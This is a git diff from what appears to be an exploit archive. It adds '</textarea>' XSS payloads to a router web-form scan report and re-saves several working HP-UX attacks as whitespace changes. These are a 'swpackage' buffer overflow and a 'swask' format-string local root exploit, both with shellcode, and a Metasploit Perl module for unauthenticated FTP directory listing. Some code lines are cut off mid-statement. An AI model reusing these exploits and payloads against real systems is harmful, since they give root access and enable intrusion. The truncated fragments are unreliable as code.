-655,9 +655,9 @@ wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRT /Forms/rpNATvirsvr_argen_1 Details -The POST variable wzVIRTUALSVR_endPort has been set to alert(408805384923)%3B . +The POST variable wzVIRTUALSVR_endPort has been set to </textarea>alert(408805384923)%3B . -wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=alert(408805384923)%3B&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar +wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=</textarea>alert(408805384923)%3B&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar ################################################################################################################################## @@ -781,9 +781,9 @@ wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzV /Forms/rpNATvirsvr_argen_1 Details -The POST variable wzVIRTUALSVR_endPortLocal has been set to alert(409105385033)%3B . +The POST variable wzVIRTUALSVR_endPortLocal has been set to </textarea>alert(409105385033)%3B . -wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=alert(409105385033)%3B&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar +wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=</textarea>alert(409105385033)%3B&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar ################################################################################################################################## @@ -821,9 +821,9 @@ wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzV /Forms/rpNATvirsvr_argen_1 Details -The POST variable wzVIRTUALSVR_endPortLocal has been set to alert(409705385375)%3B . +The POST variable wzVIRTUALSVR_endPortLocal has been set to </textarea>alert(409705385375)%3B . -wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=alert(409705385375)%3B&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar +wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=</textarea>alert(409705385375)%3B&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar ################################################################################################################################## @@ -845,7 +845,7 @@ wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag= /Forms/rpNATvirsvr_argen_1 Details -The POST variable wzVIRTUALSVR_IndexFlag has been set to alert(408605384811)%3B .wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=alert(408605384811)%3B&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar +The POST variable wzVIRTUALSVR_IndexFlag has been set to </textarea>alert(408605384811)%3B .wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=</textarea>alert(408605384811)%3B&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar ################################################################################################################################## @@ -944,9 +944,9 @@ wzVIRTUALSVR_IndexFlag=>'>alert(409185385252)%3B&wzVIR /Forms/rpNATvirsvr_argen_1 Details -The POST variable wzVIRTUALSVR_IndexFlag has been set to alert(409205385252)%3B . +The POST variable wzVIRTUALSVR_IndexFlag has been set to </textarea>alert(409205385252)%3B . -wzVIRTUALSVR_IndexFlag=alert(409205385252)%3B&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar +wzVIRTUALSVR_IndexFlag=</textarea>alert(409205385252)%3B&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar ################################################################################################################################## @@ -1072,9 +1072,9 @@ wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRT /Forms/rpNATvirsvr_argen_1 Details -The POST variable wzVIRTUALSVR_localIP has been set to alert(408905384923)%3B . +The POST variable wzVIRTUALSVR_localIP has been set to </textarea>alert(408905384923)%3B . -wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=alert(408905384923)%3B&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar +wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=</textarea>alert(408905384923)%3B&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar ################################################################################################################################## @@ -1120,9 +1120,9 @@ wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzV /Forms/rpNATvirsvr_argen_1 Details -The POST variable wzVIRTUALSVR_localIP has been set to alert(409505385265)%3B . +The POST variable wzVIRTUALSVR_localIP has been set to </textarea>alert(409505385265)%3B . -wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=alert(409505385265)%3B&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar +wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=</textarea>alert(409505385265)%3B&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar ################################################################################################################################## @@ -1190,9 +1190,9 @@ wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=-->alert(409305385263)%3B . +The POST variable wzVIRTUALSVR_startPort has been set to </textarea>alert(409305385263)%3B . -wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=alert(409305385263)%3B&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar +wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=</textarea>alert(409305385263)%3B&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar ################################################################################################################################## @@ -1206,9 +1206,9 @@ wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=alert(408705384921)%3B . +The POST variable wzVIRTUALSVR_startPort has been set to </textarea>alert(408705384921)%3B . -wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=alert(408705384921)%3B&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar +wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=</textarea>alert(408705384921)%3B&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar ################################################################################################################################## @@ -1278,9 +1278,9 @@ wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzV /Forms/rpNATvirsvr_argen_1 Details -The POST variable wzVIRTUALSVR_startPortLocal has been set to alert(409605385375)%3B . +The POST variable wzVIRTUALSVR_startPortLocal has been set to </textarea>alert(409605385375)%3B . -wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=alert(409605385375)%3B&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar +wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=</textarea>alert(409605385375)%3B&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar ################################################################################################################################## @@ -1358,9 +1358,9 @@ wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRT /Forms/rpNATvirsvr_argen_1 Details -The POST variable wzVIRTUALSVR_startPortLocal has been set to alert(409005385033)%3B . +The POST variable wzVIRTUALSVR_startPortLocal has been set to </textarea>alert(409005385033)%3B . -wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=alert(409005385033)%3B&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar +wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=</textarea>alert(409005385033)%3B&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar ################################################################################################################################## @@ -1486,9 +1486,9 @@ Connect_DialHidden=0&Connect_DialFlag=>'>alert(402485284507)%3B /Forms/rpStatus_argen_1 Details -The POST variable Connect_DialFlag has been set to alert(402505284507)%3B . +The POST variable Connect_DialFlag has been set to </textarea>alert(402505284507)%3B . -Connect_DialHidden=0&Connect_DialFlag=alert(402505284507)%3B&Connect_Flag=0 +Connect_DialHidden=0&Connect_DialFlag=</textarea>alert(402505284507)%3B&Connect_Flag=0 ################################################################################################################################## @@ -1526,9 +1526,9 @@ Connect_DialHidden=email@somealert(402435284505)%3Bdom /Forms/rpStatus_argen_1 Details -The POST variable Connect_DialHidden has been set to alert(402405284505)%3B . +The POST variable Connect_DialHidden has been set to </textarea>alert(402405284505)%3B . -Connect_DialHidden=alert(402405284505)%3B&Connect_ +Connect_DialHidden=</textarea>alert(402405284505)%3B&Connect_ ################################################################################################################################## @@ -1566,9 +1566,9 @@ Connect_DialHidden=>'>alert(402385284505)%3B&Connect_D /Forms/rpStatus_argen_1 Details -The POST variable Connect_Flag has been set to alert(402605284509)%3B . +The POST variable Connect_Flag has been set to </textarea>alert(402605284509)%3B . -Connect_DialHidden=0&Connect_DialFlag=0&Connect_Flag=alert(402605284509)%3B +Connect_DialHidden=0&Connect_DialFlag=0&Connect_Flag=</textarea>alert(402605284509)%3B ################################################################################################################################## @@ -1756,9 +1756,9 @@ The POST variable Telephone_select has been set to >'>alert(404 /Forms/rpwizard_1 Details -The POST variable Telephone_select has been set to alert(404165310549)%3B . +The POST variable Telephone_select has been set to </textarea>alert(404165310549)%3B . -Telephone_select=alert(404165310549)%3B&wzArgentinaNext=Continuar&wzFirstFlag=0 +Telephone_select=</textarea>alert(404165310549)%3B&wzArgentinaNext=Continuar&wzFirstFlag=0 ################################################################################################################################## @@ -1816,7 +1816,7 @@ Telephone_select=email@somealert(404195310549)%3Bdomai /Forms/rpwizard_1 Details -The POST variable Telephone_select has been set to alert(404365310550)%3B .Telephone_select=alert(404365310550)%3B&Telephone_select=0&wzArgentinaNext=Continuar&wzFirstFlag=0 +The POST variable Telephone_select has been set to </textarea>alert(404365310550)%3B .Telephone_select=</textarea>alert(404365310550)%3B&Telephone_select=0&wzArgentinaNext=Continuar&wzFirstFlag=0 ################################################################################################################################## @@ -1846,9 +1846,9 @@ Telephone_select=%3Cimg%20src%3D%22JaVaS%26%2399%3BRiPt:alert%28404215310549%29% /Forms/rpwizard_1 Details -The POST variable Telephone_select has been set to alert(404465310552)%3B . +The POST variable Telephone_select has been set to </textarea>alert(404465310552)%3B . -Telephone_select=0&Telephone_select=alert(404465310552)%3B&wzArgentinaNext=Continuar&wzFirstFlag=0 +Telephone_select=0&Telephone_select=</textarea>alert(404465310552)%3B&wzArgentinaNext=Continuar&wzFirstFlag=0 ################################################################################################################################## @@ -1878,9 +1878,9 @@ Telephone_select=0&wzArgentinaNext=Continuar&wzFirstFlag= . +The POST variable wzFirstFlag has been set to </textarea>alert(404565310554)%3B . -Telephone_select=0&Telephone_select=0&wzArgentinaNext=Continuar&wzFirstFlag= +Telephone_select=0&Telephone_select=0&wzArgentinaNext=Continuar&wzFirstFlag=</textarea> ################################################################################################################################## @@ -1958,9 +1958,9 @@ Telephone_select=0&wzArgentinaNext=Continuar&wzFirstFlag=>'>ale /Forms/rpwizard_1 Details -The POST variable wzFirstFlag has been set to alert(404265310550)%3B . +The POST variable wzFirstFlag has been set to </textarea>alert(404265310550)%3B . -Telephone_select=0&wzArgentinaNext=Continuar&wzFirstFlag=alert(404265310550)%3B +Telephone_select=0&wzArgentinaNext=Continuar&wzFirstFlag=</textarea>alert(404265310550)%3B ################################################################################################################################## @@ -2014,9 +2014,9 @@ wzArgen_UserName=usernameincleartexthere%40arnet-for-apb&wzArgen_Password=passwo /Forms/rpwizPppoe_1 Details -The POST variable wzConnectFlag has been set to alert(414035486122)%3B . +The POST variable wzConnectFlag has been set to </textarea>alert(414035486122)%3B . -wzArgen_UserName=usernameincleartexthere%40arnet-for-apb&wzArgen_Password=passwordincleartexthere&wzArgentinaConnect=Conectar&wzArgentinaDisConnect=Desconectar&wzConnectFlag=alert(414035486122)%3B +wzArgen_UserName=usernameincleartexthere%40arnet-for-apb&wzArgen_Password=passwordincleartexthere&wzArgentinaConnect=Conectar&wzArgentinaDisConnect=Desconectar&wzConnectFlag=</textarea>alert(414035486122)%3B ################################################################################################################################## diff --git a/platforms/hardware/webapps/10347.txt b/platforms/hardware/webapps/10347.txt index b5f6853dc..7320e4e30 100755 --- a/platforms/hardware/webapps/10347.txt +++ b/platforms/hardware/webapps/10347.txt @@ -1,4 +1,3 @@ - PenTest Information: ==================== GESEC Team (~remove) discover multiple Input Validation Vulnerabilities on Barracuda IM Firewall. diff --git a/platforms/hp-ux/dos/195.sh b/platforms/hp-ux/dos/195.sh index 9f272b5e5..6a8f99342 100755 --- a/platforms/hp-ux/dos/195.sh +++ b/platforms/hp-ux/dos/195.sh @@ -34,6 +34,6 @@ crontab -e 2> /tmp/crontab$$ grep -v "error on previous line" /tmp/crontab$$ rm -f /tmp/crontab_exp /tmp/crontab$$ - - -# milw0rm.com [2000-11-19] + + +# milw0rm.com [2000-11-19] diff --git a/platforms/hp-ux/dos/212.c b/platforms/hp-ux/dos/212.c index b2f7b068a..3a0303a0c 100755 --- a/platforms/hp-ux/dos/212.c +++ b/platforms/hp-ux/dos/212.c @@ -38,6 +38,6 @@ char **argv; exit(0); } - - -// milw0rm.com [2000-12-01] + + +// milw0rm.com [2000-12-01] diff --git a/platforms/hp-ux/local/134.c b/platforms/hp-ux/local/134.c index 82d929e52..d0ed64a15 100755 --- a/platforms/hp-ux/local/134.c +++ b/platforms/hp-ux/local/134.c @@ -98,6 +98,6 @@ int argc;char ** argv;char **env; printf("¼ÇµÃɾ³ýÕâ¸öÁÙʱÎļþ(Remember to delete the file): /tmp/.ex.cat .\n"); execl("/usr/bin/ct","/usr/bin/ct","abc_",0); /* ºÃÏ·¿ªÊ¼ÁË £º£© */ } - - -// milw0rm.com [2003-12-16] + + +// milw0rm.com [2003-12-16] diff --git a/platforms/hp-ux/local/199.c b/platforms/hp-ux/local/199.c index 954520dbf..4bb03c71e 100755 --- a/platforms/hp-ux/local/199.c +++ b/platforms/hp-ux/local/199.c @@ -70,6 +70,6 @@ int main(int argc, char *argv[]) perror("execl failed"); return(-1); } - - -// milw0rm.com [2000-11-20] + + +// milw0rm.com [2000-11-20] diff --git a/platforms/hp-ux/local/245.c b/platforms/hp-ux/local/245.c index 445df5a09..8762c19f6 100755 --- a/platforms/hp-ux/local/245.c +++ b/platforms/hp-ux/local/245.c @@ -46,6 +46,6 @@ main(int argc , char **argv){ execl("/bin/cu","cu","-l",buffer,0); } - - -// milw0rm.com [2001-01-13] + + +// milw0rm.com [2001-01-13] diff --git a/platforms/hp-ux/local/2633.c b/platforms/hp-ux/local/2633.c index 2383d6fde..ebb9f06ce 100755 --- a/platforms/hp-ux/local/2633.c +++ b/platforms/hp-ux/local/2633.c @@ -1,56 +1,56 @@ -/* HP-UX swpackage buffer overflow exploit - * ======================================= - * HP-UX 'swpackage' contains an exploitable stack overflow - * in the handling of command line arguements. Specifically the - * problem occurs due to insufficent bounds checking in the "-S" - * optional arguement. 'swpackage' is installed setuid root by - * default in HP-UX and allows for local root compromise when - * exploiting this issue. - * - * Example. - * $ cc prdelka-vs-HPUX-swpackage.c -o prdelka-vs-HPUX-swpackage - * /usr/ccs/bin/ld: (Warning) At least one PA 2.0 object file - * (prdelka-vs-HPUX-swpackage.o) was detected. The linked output may - * not run on a PA 1.x system. - * $ uname -a - * HP-UX hpux B.11.11 U 9000/785 2012383315 unlimited-user license - * $ id - * uid=102(user) gid=20(users) - * $ ls -al /usr/sbin/swpackage - * -r-sr-xr-x 2 root bin 1323008 Nov 3 2003 /usr/sbin/swpackage - * $ ./prdelka-vs-HPUX-swpackage - * [ HP-UX 11i 'swpackage' local root exploit - * $ id - * uid=0(root) gid=3(sys) euid=102(user) egid=20(users) - * - * - prdelka - */ - -char shellcode[]= - "\xeb\x5f\x1f\xfd\x0b\x39\x02\x99\xb7\x5a\x40\x22" - "\x0f\x40\x12\x0e\x20\x20\x08\x01\xe4\x20\xe0\x08" - "\xb4\x16\x70\x16""/bin/sh"; - -int main(){ - char adr[4],*b,*a,*c,*envp[1]; - int i; - *(unsigned long*)adr=0x7f7f0434; - printf("[ HP-UX 11i 'swpackage' local root exploit\n"); - b=(char*)malloc(2048); - a=b; - memset(b,0,2048); - memset(b,'a',1053); - b+=1053; - for(i=0;i<4;i++) *b++=adr[i%4]; - c=(char*)malloc(2048); - b=c; - memset(c,0,2048); - sprintf(c,"PATH="); - b+=5; - for(i=0;i - * - * ======= 01/20/06 10:19:50 EST END swask SESSION (non-interactive) - * - * $ id - * uid=0(root) gid=3(sys) euid=102(user) egid=20(users) - * $ - * - * - prdelka - */ - -char shellcode[]= - "\xeb\x5f\x1f\xfd\x0b\x39\x02\x99\xb7\x5a\x40\x22" - "\x0f\x40\x12\x0e\x20\x20\x08\x01\xe4\x20\xe0\x08" - "\xb4\x16\x70\x16""/bin/sh"; - -int main(){ - char *d, *c, *b,*a,*envp; - int i,pid; - printf("[ HP-UX 11i 'swask' local root exploit\n"); - switch(pid = fork()){ - case -1: - perror("fork"); - case 0: - a=(char*)malloc(2048); - memset(a,0,2048); - sprintf(a,"AAAAA%c%c%c%c",0x7a,0xec,0x44,0x38); - for(i=0;i<103;i++) strcat(a,"%p"); - envp=0; - execle("/usr/sbin/swask","swask","-s",a,0,envp); - break; - default: - sleep(1); - b=(char*)malloc(2048); - memset(b,0,2048); - for(i=0;i<102;i++) strcat(b,"%p"); - strcat(b,"%31799u%hn"); - a=(char*)malloc(2048); - memset(a,0,2048); - d=a; - for(i=0;i<39;i++)strcat(a,"A"); - d+=39; - for(i=0;i + * + * ======= 01/20/06 10:19:50 EST END swask SESSION (non-interactive) + * + * $ id + * uid=0(root) gid=3(sys) euid=102(user) egid=20(users) + * $ + * + * - prdelka + */ + +char shellcode[]= + "\xeb\x5f\x1f\xfd\x0b\x39\x02\x99\xb7\x5a\x40\x22" + "\x0f\x40\x12\x0e\x20\x20\x08\x01\xe4\x20\xe0\x08" + "\xb4\x16\x70\x16""/bin/sh"; + +int main(){ + char *d, *c, *b,*a,*envp; + int i,pid; + printf("[ HP-UX 11i 'swask' local root exploit\n"); + switch(pid = fork()){ + case -1: + perror("fork"); + case 0: + a=(char*)malloc(2048); + memset(a,0,2048); + sprintf(a,"AAAAA%c%c%c%c",0x7a,0xec,0x44,0x38); + for(i=0;i<103;i++) strcat(a,"%p"); + envp=0; + execle("/usr/sbin/swask","swask","-s",a,0,envp); + break; + default: + sleep(1); + b=(char*)malloc(2048); + memset(b,0,2048); + for(i=0;i<102;i++) strcat(b,"%p"); + strcat(b,"%31799u%hn"); + a=(char*)malloc(2048); + memset(a,0,2048); + d=a; + for(i=0;i<39;i++)strcat(a,"A"); + d+=39; + for(i=0;i 'HP-UX FTP Server Preauthentication Directory Listing', - 'Version' => '$Revision: 1.8 $', - 'Authors' => [ 'Optyx '], - 'Arch' => [ ], - 'OS' => [ 'hpux' ], - 'Priv' => 0, - 'UserOpts' => - { - 'RHOST' => [1, 'ADDR', 'The target address'], - 'RPORT' => [1, 'PORT', 'The FTP server port', 21], - 'RPATH' => [1, 'DATA', 'The path name to list', "/"], - }, - - 'Description' => Pex::Text::Freeform(qq{ - This exploit abuses an unpublished vulnerability in the HP-UX FTP - service. This flaw allows an unauthenticated remote user to obtain - directory listings from this server with the privileges of the root - user. This vulnerability was silently patched by HP sometime between - 2001 and 2003. -}), - 'Refs' => - [ - # None - ], - - 'Keys' => ['ftp'], - }; - -sub new { - my $class = shift; - my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); - return($self); -} - -sub Exploit { - my $self = shift; - my $target_host = $self->GetVar('RHOST'); - my $target_port = $self->GetVar('RPORT'); - my $target_path = $self->GetVar('RPATH'); - - my $s = Msf::Socket::Tcp->new - ( - 'PeerAddr' => $target_host, - 'PeerPort' => $target_port, - 'LocalPort' => $self->GetVar('CPORT'), - 'SSL' => $self->GetVar('SSL'), - ); - - if ($s->IsError) { - $self->PrintLine('[*] Error creating socket: ' . $s->GetError); - return; - } - - my $l = IO::Socket::INET->new - ( - Proto => 'tcp', - Listen => 5, - Blocking => 0, - ReuseAddr => 1, - ); - - my $r; - my $prt = ",".int($l->sockport / 256).",".int($l->sockport % 256); - my $sel = IO::Select->new($l); - my $cmd = "PORT ".join(",", split(/\./,Pex::InternetIP($target_host))).$prt."\r\n"; - - $r .= $s->Recv(-1, 5); - - $s->Send($cmd); - $r .= $s->Recv(-1, 5); - - $s->Send("LIST $target_path\r\n"); - $r .= $s->Recv(-1, 5); - $s->Close; - - foreach (split(/\n/, $r)) { - chomp; - $self->PrintLine("[*] $_"); - } - - my @rdy = $sel->can_read(3); - if (scalar(@rdy)) { - my $x = $l->accept(); - $self->PrintLine("[*] Accepted connection from ".$x->sockhost.":".$x->sockport); - - while (<$x>) { - chomp; - $self->PrintLine($_); - } - $x->shutdown(2); - $x->close; - } - $l->shutdown(2); - $l->close; - return; -} - -# milw0rm.com [2005-10-19] +## +# This file is part of the Metasploit Framework and may be redistributed +# according to the licenses defined in the Authors field below. In the +# case of an unknown or missing license, this file defaults to the same +# license as the core Framework (dual GPLv2 and Artistic). The latest +# version of the Framework can always be obtained from metasploit.com. +## + +package Msf::Exploit::hpux_ftpd_preauth_list; +use base "Msf::Exploit"; +use IO::Socket; +use IO::Select; +use strict; +use Pex::Text; + +my $advanced = { }; + +my $info = + { + 'Name' => 'HP-UX FTP Server Preauthentication Directory Listing', + 'Version' => '$Revision: 1.8 $', + 'Authors' => [ 'Optyx '], + 'Arch' => [ ], + 'OS' => [ 'hpux' ], + 'Priv' => 0, + 'UserOpts' => + { + 'RHOST' => [1, 'ADDR', 'The target address'], + 'RPORT' => [1, 'PORT', 'The FTP server port', 21], + 'RPATH' => [1, 'DATA', 'The path name to list', "/"], + }, + + 'Description' => Pex::Text::Freeform(qq{ + This exploit abuses an unpublished vulnerability in the HP-UX FTP + service. This flaw allows an unauthenticated remote user to obtain + directory listings from this server with the privileges of the root + user. This vulnerability was silently patched by HP sometime between + 2001 and 2003. +}), + 'Refs' => + [ + # None + ], + + 'Keys' => ['ftp'], + }; + +sub new { + my $class = shift; + my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); + return($self); +} + +sub Exploit { + my $self = shift; + my $target_host = $self->GetVar('RHOST'); + my $target_port = $self->GetVar('RPORT'); + my $target_path = $self->GetVar('RPATH'); + + my $s = Msf::Socket::Tcp->new + ( + 'PeerAddr' => $target_host, + 'PeerPort' => $target_port, + 'LocalPort' => $self->GetVar('CPORT'), + 'SSL' => $self->GetVar('SSL'), + ); + + if ($s->IsError) { + $self->PrintLine('[*] Error creating socket: ' . $s->GetError); + return; + } + + my $l = IO::Socket::INET->new + ( + Proto => 'tcp', + Listen => 5, + Blocking => 0, + ReuseAddr => 1, + ); + + my $r; + my $prt = ",".int($l->sockport / 256).",".int($l->sockport % 256); + my $sel = IO::Select->new($l); + my $cmd = "PORT ".join(",", split(/\./,Pex::InternetIP($target_host))).$prt."\r\n"; + + $r .= $s->Recv(-1, 5); + + $s->Send($cmd); + $r .= $s->Recv(-1, 5); + + $s->Send("LIST $target_path\r\n"); + $r .= $s->Recv(-1, 5); + $s->Close; + + foreach (split(/\n/, $r)) { + chomp; + $self->PrintLine("[*] $_"); + } + + my @rdy = $sel->can_read(3); + if (scalar(@rdy)) { + my $x = $l->accept(); + $self->PrintLine("[*] Accepted connection from ".$x->sockhost.":".$x->sockport); + + while (<$x>) { + chomp; + $self->PrintLine($_); + } + $x->shutdown(2); + $x->close; + } + $l->shutdown(2); 